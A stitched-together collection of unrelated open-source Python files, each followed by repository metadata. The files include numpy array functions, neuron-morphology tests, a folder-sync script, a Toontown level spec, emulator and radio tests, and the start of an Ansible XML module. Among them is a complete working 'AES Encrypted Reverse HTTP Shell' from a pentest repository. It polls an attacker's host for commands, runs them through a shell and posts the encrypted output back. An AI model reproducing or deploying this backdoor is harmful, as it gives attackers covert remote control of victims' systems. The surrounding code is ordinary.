In case of ties, leftmost wins. If no wrapper is found, return None
"""
wrappers = sorted((getattr(x, '__array_priority__', 0), -i,
x.__array_wrap__) for i, x in enumerate(args)
if hasattr(x, '__array_wrap__'))
if wrappers:
return wrappers[-1][-1]
return None
def kron(a, b):
"""
Kronecker product of two arrays.
Computes the Kronecker product, a composite array made of blocks of the
second array scaled by the first.
Parameters
----------
a, b : array_like
Returns
-------
out : ndarray
See Also
--------
outer : The outer product
Notes
-----
The function assumes that the number of dimensions of `a` and `b`
are the same, if necessary prepending the smallest with ones.
If `a.shape = (r0,r1,..,rN)` and `b.shape = (s0,s1,...,sN)`,
the Kronecker product has shape `(r0*s0, r1*s1, ..., rN*SN)`.
The elements are products of elements from `a` and `b`, organized
explicitly by::
kron(a,b)[k0,k1,...,kN] = a[i0,i1,...,iN] * b[j0,j1,...,jN]
where::
kt = it * st + jt, t = 0,...,N
In the common 2-D case (N=1), the block structure can be visualized::
[[ a[0,0]*b, a[0,1]*b, ... , a[0,-1]*b ],
[ ... ... ],
[ a[-1,0]*b, a[-1,1]*b, ... , a[-1,-1]*b ]]
Examples
--------
>>> np.kron([1,10,100], [5,6,7])
array([ 5, 6, 7, 50, 60, 70, 500, 600, 700])
>>> np.kron([5,6,7], [1,10,100])
array([ 5, 50, 500, 6, 60, 600, 7, 70, 700])
>>> np.kron(np.eye(2), np.ones((2,2)))
array([[ 1., 1., 0., 0.],
[ 1., 1., 0., 0.],
[ 0., 0., 1., 1.],
[ 0., 0., 1., 1.]])
>>> a = np.arange(100).reshape((2,5,2,5))
>>> b = np.arange(24).reshape((2,3,4))
>>> c = np.kron(a,b)
>>> c.shape
(2, 10, 6, 20)
>>> I = (1,3,0,2)
>>> J = (0,2,1)
>>> J1 = (0,) + J # extend to ndim=4
>>> S1 = (1,) + b.shape
>>> K = tuple(np.array(I) * np.array(S1) + np.array(J1))
>>> c[K] == a[I]*b[J]
True
"""
b = asanyarray(b)
a = array(a, copy=False, subok=True, ndmin=b.ndim)
ndb, nda = b.ndim, a.ndim
if (nda == 0 or ndb == 0):
return _nx.multiply(a, b)
as_ = a.shape
bs = b.shape
if not a.flags.contiguous:
a = reshape(a, as_)
if not b.flags.contiguous:
b = reshape(b, bs)
nd = ndb
if (ndb != nda):
if (ndb > nda):
as_ = (1,)*(ndb-nda) + as_
else:
bs = (1,)*(nda-ndb) + bs
nd = nda
result = outer(a, b).reshape(as_+bs)
axis = nd-1
for _ in range(nd):
result = concatenate(result, axis=axis)
wrapper = get_array_prepare(a, b)
if wrapper is not None:
result = wrapper(result)
wrapper = get_array_wrap(a, b)
if wrapper is not None:
result = wrapper(result)
return result
def tile(A, reps):
"""
Construct an array by repeating A the number of times given by reps.
If `reps` has length ``d``, the result will have dimension of
``max(d, A.ndim)``.
If ``A.ndim < d``, `A` is promoted to be d-dimensional by prepending new
axes. So a shape (3,) array is promoted to (1, 3) for 2-D replication,
or shape (1, 1, 3) for 3-D replication. If this is not the desired
behavior, promote `A` to d-dimensions manually before calling this
function.
If ``A.ndim > d``, `reps` is promoted to `A`.ndim by pre-pending 1's to it.
Thus for an `A` of shape (2, 3, 4, 5), a `reps` of (2, 2) is treated as
(1, 1, 2, 2).
Parameters
----------
A : array_like
The input array.
reps : array_like
The number of repetitions of `A` along each axis.
Returns
-------
c : ndarray
The tiled output array.
See Also
--------
repeat : Repeat elements of an array.
Examples
--------
>>> a = np.array([0, 1, 2])
>>> np.tile(a, 2)
array([0, 1, 2, 0, 1, 2])
>>> np.tile(a, (2, 2))
array([[0, 1, 2, 0, 1, 2],
[0, 1, 2, 0, 1, 2]])
>>> np.tile(a, (2, 1, 2))
array([[[0, 1, 2, 0, 1, 2]],
[[0, 1, 2, 0, 1, 2]]])
>>> b = np.array([[1, 2], [3, 4]])
>>> np.tile(b, 2)
array([[1, 2, 1, 2],
[3, 4, 3, 4]])
>>> np.tile(b, (2, 1))
array([[1, 2],
[3, 4],
[1, 2],
[3, 4]])
"""
try:
tup = tuple(reps)
except TypeError:
tup = (reps,)
d = len(tup)
if all(x == 1 for x in tup) and isinstance(A, _nx.ndarray):
# Fixes the problem that the function does not make a copy if A is a
# numpy array and the repetitions are 1 in all dimensions
return _nx.array(A, copy=True, subok=True, ndmin=d)
else:
# Note that no copy of zero-sized arrays is made. However since they
# have no data there is no risk of an inadvertent overwrite.
c = _nx.array(A, copy=False, subok=True, ndmin=d)
if (d < c.ndim):
tup = (1,)*(c.ndim-d) + tup
shape_out = tuple(s*t for s, t in zip(c.shape, tup))
n = c.size
if n > 0:
for dim_in, nrep in zip(c.shape, tup):
if nrep != 1:
c = c.reshape(-1, n).repeat(nrep, 0)
n //= dim_in
return c.reshape(shape_out)
| WillieMaddox/numpy | numpy/lib/shape_base.py | Python | bsd-3-clause | 25,222 |
# Copyright (c) 2015, Ecole Polytechnique Federale de Lausanne, Blue Brain Project
# All rights reserved.
#
# This file is part of NeuroM <https://github.com/BlueBrain/NeuroM>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of
# its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
from copy import copy
from nose import tools as nt
from neurom.check.runner import CheckRunner
from neurom.exceptions import ConfigError
_path = os.path.dirname(os.path.abspath(__file__))
SWC_PATH = os.path.join(_path, '../../../test_data/swc/')
NRN_PATH_0 = os.path.join(SWC_PATH, 'Neuron.swc')
NRN_PATH_1 = os.path.join(SWC_PATH, 'Neuron_zero_length_sections.swc')
NRN_PATH_2 = os.path.join(SWC_PATH, 'Single_apical.swc')
NRN_PATH_3 = os.path.join(SWC_PATH, 'Single_basal.swc')
NRN_PATH_4 = os.path.join(SWC_PATH, 'Single_axon.swc')
NRN_PATH_5 = os.path.join(SWC_PATH, 'Single_apical_no_soma.swc')
CONFIG = {
'checks': {
'structural_checks': [
'is_single_tree',
'has_soma_points',
'has_sequential_ids',
'has_increasing_ids',
'has_valid_soma',
'has_valid_neurites'
],
'neuron_checks': [
'has_basal_dendrite',
'has_axon',
'has_apical_dendrite',
'has_all_nonzero_segment_lengths',
'has_all_nonzero_section_lengths',
'has_all_nonzero_neurite_radii',
'has_nonzero_soma_radius'
]
},
'options': {
'has_nonzero_soma_radius': 0.0,
"has_all_nonzero_neurite_radii": 0.007,
"has_all_nonzero_segment_lengths": 0.01,
"has_all_nonzero_section_lengths": [0.01]
},
}
CONFIG_COLOR = copy(CONFIG)
CONFIG_COLOR['color'] = True
REF_0 = {
'files': {
NRN_PATH_0: {
"Is single tree": True,
"Has soma points": True,
"Has sequential ids": True,
"Has increasing ids": True,
"Has valid soma": True,
"Has valid neurites": True,
"Has basal dendrite": True,
"Has axon": True,
"Has apical dendrite": True,
"Has all nonzero segment lengths": True,
"Has all nonzero section lengths": True,
"Has all nonzero neurite radii": True,
"Has nonzero soma radius": True,
"ALL": True
}
},
"STATUS": "PASS"
}
REF_1 = {
'files': {
NRN_PATH_1: {
"Is single tree": True,
"Has soma points": True,
"Has sequential ids": True,
"Has increasing ids": True,
"Has valid soma": True,
"Has valid neurites": True,
"Has basal dendrite": True,
"Has axon": True,
"Has apical dendrite": True,
"Has all nonzero segment lengths": False,
"Has all nonzero section lengths": False,
"Has all nonzero neurite radii": True,
"Has nonzero soma radius": True,
"ALL": False
}
},
"STATUS": "FAIL"
}
REF_2 = {
'files': {
NRN_PATH_2: {
"Is single tree": True,
"Has soma points": True,
"Has sequential ids": True,
"Has increasing ids": True,
"Has valid soma": True,
"Has valid neurites": True,
"Has basal dendrite": False,
"Has axon": False,
"Has apical dendrite": True,
"Has all nonzero segment lengths": False,
"Has all nonzero section lengths": True,
"Has all nonzero neurite radii": True,
"Has nonzero soma radius": True,
"ALL": False
}
},
"STATUS": "FAIL"
}
REF_3 = {
'files': {
NRN_PATH_3: {
"Is single tree": True,
"Has soma points": True,
"Has sequential ids": True,
"Has increasing ids": True,
"Has valid soma": True,
"Has valid neurites": True,
"Has basal dendrite": True,
"Has axon": False,
"Has apical dendrite": False,
"Has all nonzero segment lengths": False,
"Has all nonzero section lengths": True,
"Has all nonzero neurite radii": True,
"Has nonzero soma radius": False,
"ALL": False
}
},
"STATUS": "FAIL"
}
REF_4 = {
'files': {
NRN_PATH_4: {
"Is single tree": True,
"Has soma points": True,
"Has sequential ids": True,
"Has increasing ids": True,
"Has valid soma": True,
"Has valid neurites": True,
"Has basal dendrite": False,
"Has axon": True,
"Has apical dendrite": False,
"Has all nonzero segment lengths": False,
"Has all nonzero section lengths": True,
"Has all nonzero neurite radii": True,
"Has nonzero soma radius": True,
"ALL": False
}
},
"STATUS": "FAIL"
}
REF_5 = {
'files': {
NRN_PATH_5: {
"Is single tree": True,
"Has soma points": False,
"Has sequential ids": True,
"Has increasing ids": True,
"Has valid soma": False,
"Has valid neurites": False,
"ALL": False
}
},
"STATUS": "FAIL"
}
def test_ok_neuron():
checker = CheckRunner(CONFIG)
summ = checker.run(NRN_PATH_0)
nt.assert_equal(summ, REF_0)
def test_ok_neuron_color():
checker = CheckRunner(CONFIG_COLOR)
summ = checker.run(NRN_PATH_0)
nt.assert_equal(summ, REF_0)
def test_zero_length_sections_neuron():
checker = CheckRunner(CONFIG)
summ = checker.run(NRN_PATH_1)
nt.assert_equal(summ, REF_1)
def test_single_apical_neuron():
checker = CheckRunner(CONFIG)
summ = checker.run(NRN_PATH_2)
nt.assert_equal(summ, REF_2)
def test_single_basal_neuron():
checker = CheckRunner(CONFIG)
summ = checker.run(NRN_PATH_3)
nt.assert_equal(summ, REF_3)
def test_single_axon_neuron():
checker = CheckRunner(CONFIG)
summ = checker.run(NRN_PATH_4)
nt.assert_equal(summ, REF_4)
def test_single_apical_no_soma():
checker = CheckRunner(CONFIG)
summ = checker.run(NRN_PATH_5)
nt.assert_equal(summ, REF_5)
def test_directory_input():
checker = CheckRunner(CONFIG)
summ = checker.run(SWC_PATH)
nt.eq_(summ['files'][NRN_PATH_0]['Has axon'], True)
nt.eq_(summ['files'][NRN_PATH_2]['Has axon'], False)
@nt.raises(IOError)
def test_invalid_data_path_raises_IOError():
checker = CheckRunner(CONFIG)
_ = checker.run('foo/bar/baz')
def test__sanitize_config():
# fails if missing 'checks'
nt.assert_raises(ConfigError, CheckRunner._sanitize_config, {})
# creates minimal config
new_config = CheckRunner._sanitize_config({'checks': {}})
nt.eq_(new_config, {'checks':
{'structural_checks': [],
'neuron_checks': [],
},
'options': {},
'color': False,
})
# makes no changes to already filled out config
new_config = CheckRunner._sanitize_config(CONFIG)
nt.eq_(CONFIG, new_config)
| eleftherioszisis/NeuroM | neurom/check/tests/test_runner.py | Python | bsd-3-clause | 8,711 |
import numpy as np
import glob
dir2data = "/Volumes/HGST5/APS1504_AlCu/recon/D_Coarsening_2/recon_2/"
prefix = "recon_"
dir2out = "/Volumes/HGST5/APS1504_AlCu/recon/D_Coarsening_2/combine_test/"
flist = glob.glob(dir2data+prefix+"*.bin")
def parse_filename(filename):
t, z = filename.split('.')[0].split('_')[-3::2]
return int(t), int(z)
fdict = {}
for f in flist:
t, z = parse_filename(f)
try:
fdict[t].append(z)
except KeyError:
fdict[t] = [z]
for t, zlist in fdict.items():
out_name = dir2out+prefix+"t_%d.bin" % t
print("Opening output file %s" % out_name)
fout = open(out_name, 'wb')
for z in sorted(zlist):
data_name = dir2data+prefix+"t_%d_z_%d.bin" % (t, z)
print("Reading data file %s" % data_name)
fin = open(data_name, 'rb')
fout.write(fin.read())
fin.close()
fout.close()
| decarlof/timbir | doc/collection/APS_32ID/non-interlaced/combine_bin.py | Python | bsd-3-clause | 889 |
#!/usr/bin/env python
""" Sincronizarea a doua directoare """
import os
import time
import shutil
# pylint: disable=too-many-locals
# pylint: disable=global-statement
OLD_FILESET = dict()
def copyfile(src, dest):
""" Copiaza fisiere cu metadate """
destinatie = os.path.split(dest)
dest = destinatie[0]
if not os.path.exists(dest):
os.makedirs(dest)
shutil.copy2(src, dest)
def get_fileset(path):
""" Construieste lista de fisiere din directorul dat si din subdirectoare,
cu data ultimei moficari """
fileset = dict()
for root, _, files in list(os.walk(path)):
if not os.path.islink(root):
for fname in files:
cfil = os.path.join(os.path.relpath(root, path), fname)
fileset[cfil] = int(os.path.getmtime(os.path.join(path, cfil)))
return fileset
def sync_folders(folder1, folder2):
""" Functia de sincronizare a directoarelor """
fileset1 = get_fileset(folder1)
files1 = set(fileset1.keys())
fileset2 = get_fileset(folder2)
files2 = set(fileset2.keys())
total_files = files1.union(files2)
common_files = files1.intersection(files2)
ch_comm_files = {o for o in common_files if fileset1[o] != fileset2[o]}
ch_fs1_files = {o for o in ch_comm_files if fileset1[o] > fileset2[o]}
ch_fs2_files = {o for o in ch_comm_files if fileset2[o] > fileset1[o]}
files_only_in_set1 = total_files - files2
files_only_in_set2 = total_files - files1
deleted_set1 = files_only_in_set2.intersection(set(OLD_FILESET.keys()))
deleted_set2 = files_only_in_set1.intersection(set(OLD_FILESET.keys()))
new_files_in_set1 = files_only_in_set1 - deleted_set2
new_files_in_set2 = files_only_in_set2 - deleted_set1
for fisier in new_files_in_set1.union(ch_fs1_files):
copyfile(os.path.join(folder1, fisier), os.path.join(folder2, fisier))
print "se copiaza 1->2 ", fisier
for fisier in new_files_in_set2.union(ch_fs2_files):
copyfile(os.path.join(folder2, fisier), os.path.join(folder1, fisier))
print "se copiaza 2->1 ", fisier
for fisier in deleted_set1:
os.remove(os.path.join(folder2, fisier))
print "se sterge din 2 ", fisier
for fisier in deleted_set2:
os.remove(os.path.join(folder1, fisier))
print "se sterge din 1 ", fisier
def main():
""" Sincronizeaza 2 directoare """
global OLD_FILESET
folder1 = "/home/iulian/Desktop/testSync/A"
folder2 = "/home/iulian/Desktop/testSync/B"
interval_sincronizare = 10 # sec
while 1:
sync_folders(folder1, folder2)
OLD_FILESET = get_fileset(folder1)
time.sleep(interval_sincronizare)
if __name__ == "__main__":
main()
| c-square/python-lab | python/solutii/iulian_bute/sync.py | Python | mit | 2,742 |
from qtpy.QtCore import QTimer
class Spin:
def __init__(self, parent_widget, interval=10, step=1):
self.parent_widget = parent_widget
self.interval, self.step = interval, step
self.info = {}
def _update(self, parent_widget):
if self.parent_widget in self.info:
timer, angle, step = self.info[self.parent_widget]
if angle >= 360:
angle = 0
angle += step
self.info[parent_widget] = timer, angle, step
parent_widget.update()
def setup(self, icon_painter, painter, rect):
if self.parent_widget not in self.info:
timer = QTimer()
timer.timeout.connect(lambda: self._update(self.parent_widget))
self.info[self.parent_widget] = [timer, 0, self.step]
timer.start(self.interval)
else:
timer, angle, self.step = self.info[self.parent_widget]
x_center = rect.width() * 0.5
y_center = rect.height() * 0.5
painter.translate(x_center, y_center)
painter.rotate(angle)
painter.translate(-x_center, -y_center)
class Pulse(Spin):
def __init__(self, parent_widget):
Spin.__init__(self, parent_widget, interval=300, step=45)
| daodaoliang/qtawesome | qtawesome/animation.py | Python | mit | 1,284 |
from toontown.coghq.SpecImports import *
GlobalEntities = {1000: {'type': 'levelMgr',
'name': 'LevelMgr',
'comment': '',
'parentEntId': 0,
'cogLevel': 0,
'farPlaneDistance': 1500,
'modelFilename': 'phase_12/models/bossbotHQ/BossbotGreenRoom_A',
'wantDoors': 1},
1001: {'type': 'editMgr',
'name': 'EditMgr',
'parentEntId': 0,
'insertEntity': None,
'removeEntity': None,
'requestNewEntity': None,
'requestSave': None},
0: {'type': 'zone',
'name': 'UberZone',
'comment': '',
'parentEntId': 0,
'scale': 1,
'description': '',
'visibility': []},
110301: {'type': 'door',
'name': '<unnamed>',
'comment': '',
'parentEntId': 110303,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1,
'color': Vec4(1, 1, 1, 1),
'isLock0Unlocked': 1,
'isLock1Unlocked': 0,
'isLock2Unlocked': 1,
'isLock3Unlocked': 1,
'isOpen': 0,
'isOpenEvent': 0,
'isVisBlocker': 0,
'secondsOpen': 1,
'unlock0Event': 0,
'unlock1Event': 110302,
'unlock2Event': 0,
'unlock3Event': 0},
110302: {'type': 'golfGreenGame',
'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1,
'cellId': 0,
'puzzleBase': 3,
'puzzlePerPlayer': 1,
'switchId': 0,
'timeToPlay': 120},
10002: {'type': 'nodepath',
'name': 'props',
'comment': '',
'parentEntId': 0,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
110303: {'type': 'nodepath',
'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(40.9635, 2, 0),
'hpr': Vec3(270, 0, 0),
'scale': Vec3(1, 1, 1)}}
Scenario0 = {}
levelSpec = {'globalEntities': GlobalEntities,
'scenarios': [Scenario0]}
| ksmit799/Toontown-Source | toontown/coghq/BossbotCountryClubGreenRoom_Action00.py | Python | mit | 2,122 |
#! /usr/bin/env python
from asm_test import Asm_Test
class Test_PUSHPOP(Asm_Test):
TXT = '''
main:
MOV EBP, ESP
PUSH 0x11223344
POP EAX
CMP EBP, ESP
JNZ BAD
PUSHW 0x1122
POPW AX
CMP EBP, ESP
JNZ BAD
PUSH SS
POP EAX
CMP EBP, ESP
JNZ BAD
PUSHW SS
POPW AX
CMP EBP, ESP
JNZ BAD
PUSHFD
POP EAX
CMP EBP, ESP
JNZ BAD
PUSHFW
POPW AX
CMP EBP, ESP
JNZ BAD
PUSH EAX
POPFD
CMP EBP, ESP
JNZ BAD
PUSHW AX
POPFW
CMP EBP, ESP
JNZ BAD
RET
BAD:
INT 0x3
RET
'''
def check(self):
assert(self.myjit.cpu.ESP-4 == self.myjit.cpu.EBP)
if __name__ == "__main__":
[test()() for test in [Test_PUSHPOP]]
| amohanta/miasm | test/arch/x86/unit/mn_stack.py | Python | gpl-2.0 | 977 |
#!/usr/bin/python
##########################################################################################################################
#
#
# AES Encrypted Reverse HTTP Shell by:
#
# Dave Kennedy (ReL1K)
# http://www.secmaniac.com
#
##########################################################################################################################
#
##########################################################################################################################
#
# To compile, you will need pyCrypto, it's a pain to install if you do it from source, should get the binary modules
# to make it easier. Can download from here:
# http://www.voidspace.org.uk/cgi-bin/voidspace/downman.py?file=pycrypto-2.0.1.win32-py2.5.zip
#
##########################################################################################################################
#
# This shell works on any platform you want to compile it in. OSX, Windows, Linux, etc.
#
##########################################################################################################################
#
##########################################################################################################################
#
# Below is the steps used to compile the binary. py2exe requires a dll to be used in conjunction
# so py2exe was not used. Instead, pyinstaller was used in order to byte compile the binary.
#
##########################################################################################################################
#
# export VERSIONER_PYTHON_PREFER_32_BIT=yes
# python Configure.py
# python Makespec.py --onefile --noconsole shell.py
# python Build.py shell/shell.spec
#
###########################################################################################################################
import urllib
import urllib2
import httplib
import subprocess
import sys
import base64
import os
from Crypto.Cipher import AES
# the block size for the cipher object; must be 16, 24, or 32 for AES
BLOCK_SIZE = 32
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
# secret key, change this if you want to be unique
secret = "Fj39@vF4@54&8dE@!)(*^+-pL;'dK3J2"
# create a cipher object using the random secret
cipher = AES.new(secret)
# TURN THIS ON IF YOU WANT PROXY SUPPORT
PROXY_SUPPORT = "OFF"
# THIS WILL BE THE PROXY URL
PROXY_URL = "http://proxyinfo:80"
# USERNAME FOR THE PROXY
USERNAME = "username"
# PASSWORD FOR THE PROXY
PASSWORD = "password"
# here is where we set all of our proxy settings
if PROXY_SUPPORT == "ON":
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password(realm='RESTRICTED ACCESS',
uri=PROXY_URL, # PROXY SPECIFIED ABOVE
user=USERNAME, # USERNAME SPECIFIED ABOVE
passwd=PASSWORD) # PASSWORD SPECIFIED ABOVE
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
try:
# our reverse listener ip address
address = sys.argv[1]
# our reverse listener port address
port = sys.argv[2]
# except that we didn't pass parameters
except IndexError:
print " \nAES Encrypted Reverse HTTP Shell by:"
print " Dave Kennedy (ReL1K)"
print " http://www.secmaniac.com"
print "Usage: shell.exe <reverse_ip_address> <port>"
sys.exit()
# loop forever
while 1:
# open up our request handelr
req = urllib2.Request('http://%s:%s' % (address,port))
# grab our response which contains what command we want
message = urllib2.urlopen(req)
# base64 unencode
message = base64.b64decode(message.read())
# decrypt the communications
message = DecodeAES(cipher, message)
# quit out if we receive that command
if message == "quit" or message == "exit":
sys.exit()
# issue the shell command we want
proc = subprocess.Popen(message, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# read out the data of stdout
data = proc.stdout.read() + proc.stderr.read()
# encrypt the data
data = EncodeAES(cipher, data)
# base64 encode the data
data = base64.b64encode(data)
# urlencode the data from stdout
data = urllib.urlencode({'cmd': '%s'}) % (data)
# who we want to connect back to with the shell
h = httplib.HTTPConnection('%s:%s' % (address,port))
# set our basic headers
headers = {"User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)","Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
# actually post the data
h.request('POST', '/index.aspx', data, headers)
| firebitsbr/raspberry_pwn | src/pentest/revshells/encrypted_http_shell/shell.py | Python | gpl-3.0 | 5,129 |
from __future__ import division
import unittest
import os
import logging
import numpy as np
from pele.potentials import _inversepower_cpp
from pele.optimize._quench import lbfgs_cpp
import _base_test
def read_xyzdr(fname, bdim=3):
coords = []
radii = []
rattlers = []
f = open(fname, "r")
while True:
xyzdr = f.readline()
if not xyzdr: break
x, y, z, d, r = xyzdr.split()
coords.extend([float(x), float(y), float(z)])
radii.extend([float(d) / 2])
for _ in xrange(bdim):
rattlers.extend([float(r)])
return np.array(coords), np.array(radii), np.array(rattlers)
def minimize(coords, pot):
result = lbfgs_cpp(coords, pot)
# result = modifiedfire_cpp(coords, pot)
return result.coords, result.energy, result.grad, result.rms
class TestInversePower_CPP(_base_test._BaseTest):
def setUp(self):
current_dir = os.path.dirname(__file__)
xyz, hs_radii, rattlers = read_xyzdr(current_dir + "/_hswca20_min2.xyzdr")
sca = 0.205071132088
radii = hs_radii * (1.0 + sca)
boxv = np.array([6.26533756282, 6.26533756282, 6.26533756282])
pow = 4
eps = 1
self.pot = _inversepower_cpp.InversePower(pow, eps, radii, boxvec=boxv)
self.natoms = 20
result = minimize(xyz, self.pot)
self.xmin = result[0] # xyz
self.Emin = result[1] # self.pot.getEnergy(self.xmin)
print self.Emin
self.xrandom = np.random.uniform(-1, 1, len(xyz)) * 1e-2
if __name__ == "__main__":
logging.basicConfig(filename='hs_wca_cpp.log', level=logging.DEBUG)
unittest.main() | kjs73/pele | pele/potentials/tests/test_inversepower_cpp.py | Python | gpl-3.0 | 1,652 |
#!/usr/bin/env python
#
# Copyright 2007,2010 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, gr_unittest
from pprint import pprint
class test_ofdm_insert_preamble (gr_unittest.TestCase):
def setUp (self):
self.tb = gr.top_block ()
def tearDown (self):
self.tb = None
def helper(self, v0, v1, fft_length, preamble):
tb = self.tb
src0 = gr.vector_source_c(v0)
src1 = gr.vector_source_b(v1)
s2v = gr.stream_to_vector(gr.sizeof_gr_complex, fft_length)
# print "len(v) = %d" % (len(v))
op = gr.ofdm_insert_preamble(fft_length, preamble)
v2s = gr.vector_to_stream(gr.sizeof_gr_complex, fft_length)
dst0 = gr.vector_sink_c()
dst1 = gr.vector_sink_b()
tb.connect(src0, s2v, (op, 0))
tb.connect(src1, (op, 1))
tb.connect((op, 0), v2s, dst0)
tb.connect((op, 1), dst1)
tb.run()
r0 = dst0.data()
r0v = []
for i in range(len(r0)//fft_length):
r0v.append(r0[i*fft_length:(i+1)*fft_length])
r1 = dst1.data()
self.assertEqual(len(r0v), len(r1))
return (r1, r0v)
def check_match(self, actual, expected_list):
lst = []
map(lambda x: lst.append(x), expected_list)
self.assertEqual(actual, lst)
# ----------------------------------------------------------------
def test_000(self):
# no preamble, 1 symbol payloads
preamble = ()
fft_length = 8
npayloads = 8
v = []
p = []
for i in range(npayloads):
t = fft_length*[(i + i*1j)]
p.append(tuple(t))
v += t
p = tuple(p)
r = self.helper(v, npayloads*[1], fft_length, preamble)
# pprint(r)
self.assertEqual(r[0], tuple(npayloads*[1]))
self.check_match(r[1], (p[0],p[1],p[2],p[3],p[4],p[5],p[6],p[7]))
def test_001(self):
# 1 symbol preamble, 1 symbol payloads
preamble = ((100, 101, 102, 103, 104, 105, 106, 107),)
p0 = preamble[0]
fft_length = 8
npayloads = 8
v = []
p = []
for i in range(npayloads):
t = fft_length*[(i + i*1j)]
p.append(tuple(t))
v += t
r = self.helper(v, npayloads*[1], fft_length, preamble)
self.assertEqual(r[0], tuple(npayloads*[1, 0]))
self.check_match(r[1], (p0, p[0],
p0, p[1],
p0, p[2],
p0, p[3],
p0, p[4],
p0, p[5],
p0, p[6],
p0, p[7]))
def test_002(self):
# 2 symbol preamble, 1 symbol payloads
preamble = ((100, 101, 102, 103, 104, 105, 106, 107),
(200, 201, 202, 203, 204, 205, 206, 207))
p0 = preamble[0]
p1 = preamble[1]
fft_length = 8
npayloads = 8
v = []
p = []
for i in range(npayloads):
t = fft_length*[(i + i*1j)]
p.append(tuple(t))
v += t
r = self.helper(v, npayloads*[1], fft_length, preamble)
self.assertEqual(r[0], tuple(npayloads*[1, 0, 0]))
self.check_match(r[1], (p0, p1, p[0],
p0, p1, p[1],
p0, p1, p[2],
p0, p1, p[3],
p0, p1, p[4],
p0, p1, p[5],
p0, p1, p[6],
p0, p1, p[7]))
def xtest_003_preamble(self):
# 2 symbol preamble, 2 symbol payloads
preamble = ((100, 101, 102, 103, 104, 105, 106, 107),
(200, 201, 202, 203, 204, 205, 206, 207))
p0 = preamble[0]
p1 = preamble[1]
fft_length = 8
npayloads = 8
v = []
p = []
for i in range(npayloads * 2):
t = fft_length*[(i + i*1j)]
p.append(tuple(t))
v += t
r = self.helper(v, npayloads*[1, 0], fft_length, preamble)
self.assertEqual(r[0], tuple(npayloads*[1, 0, 0, 0]))
self.check_match(r[1], (p0, p1, p[0], p[1],
p0, p1, p[2], p[3],
p0, p1, p[4], p[5],
p0, p1, p[6], p[7],
p0, p1, p[8], p[9],
p0, p1, p[10], p[11],
p0, p1, p[12], p[13],
p0, p1, p[14], p[15]))
if __name__ == '__main__':
gr_unittest.run(test_ofdm_insert_preamble, "test_ofdm_insert_preamble.xml")
| pgoeser/gnuradio | gnuradio-core/src/python/gnuradio/gr/qa_ofdm_insert_preamble.py | Python | gpl-3.0 | 5,627 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2014, Red Hat, Inc.
# Copyright: (c) 2014, Tim Bielawa <[email protected]>
# Copyright: (c) 2014, Magnus Hedemark <[email protected]>
# Copyright: (c) 2017, Dag Wieers <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: xml
short_description: Manage bits and pieces of XML files or strings
description:
- A CRUD-like interface to managing bits of XML files.
version_added: '2.4'
options:
path:
description:
- Path to the file to operate on.
- This file must exist ahead of time.
- This parameter is required, unless C(xmlstring) is given.
type: path
required: yes
aliases: [ dest, file ]
xmlstring:
description:
- A string containing XML on which to operate.
